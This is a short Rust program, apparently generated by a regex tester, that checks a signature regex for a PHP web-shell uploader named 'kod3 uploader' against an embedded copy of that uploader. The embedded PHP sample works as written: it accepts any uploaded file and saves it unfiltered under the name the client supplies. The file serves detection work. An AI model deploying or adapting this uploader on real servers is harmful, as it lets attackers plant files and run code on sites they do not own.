// include the latest version of the regex crate in your Cargo.toml
extern crate regex;
use regex::Regex;
fn main() {
let regex = Regex::new(r#"(?is)^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*['"]<title>kod3 uploader<\/title>.{0,70}?multipart\/form-data["']\s*name=["']uploader.{0,240}?\@move_uploaded_file\(\$_files\[["']file['"]\].{0,50}?echo\s*['"]upload\s*successfully.{0,60}?[[:punct:]\s]+$"#).unwrap();
let string = "<?php
echo \"<title>kod3 Uploader</title>\";
echo \"<form method='post' enctype='multipart/form-data' name='uploader'>\";
echo '<input type=\"file\" name=\"file\" ><input name=\"upl\" type=\"submit\" id=\"upl\" value=\"Upload\"></form>';
if(isset($_POST['upl'])&&$_POST['upl']== \"Upload\"){
if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
echo 'Upload Successfully ;)<br><br>';
}else{
echo 'Upload failed :(<br><br>';
}
}
?>";
// result will be an iterator over tuples containing the start and end indices for each match in the string
let result = regex.captures_iter(string);
for mat in result {
println!("{:?}", mat);
}
}